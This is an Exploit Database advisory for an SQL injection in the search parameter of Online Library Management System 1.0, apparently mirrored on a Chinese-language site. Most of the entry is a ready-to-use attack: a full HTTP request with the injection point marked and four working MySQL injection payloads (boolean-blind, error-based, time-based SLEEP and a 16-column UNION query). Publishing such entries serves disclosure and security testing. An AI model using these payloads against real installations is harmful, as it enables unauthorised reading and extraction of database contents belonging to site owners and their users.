Online Library Management System 1.0 – ‘Search’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： Berk Can Geyikci
  日期： 2021-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50053/

• # Exploit Title: Online Library Management System 1.0 - 'Search' SQL Injection
  # Date: 23-06-2021
  # Exploit Author: Berk Can Geyikci
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
  # Version: 1.0
  # Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
  
  #Vulnerable URL: http://localhost/ols/index.php?q={random string} 
  #Search Parameter 
  
  
  Request:
  
  POST /ols/index.php?q=find HTTP/1.1
  Host: localhost
  Content-Length: 16
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://localhost
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Referer: http://localhost/ols/index.php?q=find
  Accept-Encoding: gzip, deflate
  Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: PHPSESSID=msjh9j7ngitv8k79g9or1rov0d
  Connection: close
  
  search=a&Search={INJECT HERE}
  
  
  POC 1:
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
  Payload: search=AA&Search=') AND 5208=5208#
  Vector: AND [INFERENCE]#
  
  POC 2:
  	Type: error-based
  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: search=aa&Search=') OR (SELECT 5630 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(5630=5630,1))),0x717a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XONS
  Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  
  POC 3:
  	Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: search=aa&Search=') AND (SELECT 3884 FROM (SELECT(SLEEP(5)))baxK)-- uNHU
  Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
  
  POC 4:
  	Type: UNION query
  Title: MySQL UNION query (NULL) - 16 columns
  Payload: search=aa&Search=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162787171,0x7665436f41665177487458444d6c4358416d6a716869586c476d504b67647178695064414f4e444f,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  Vector:UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#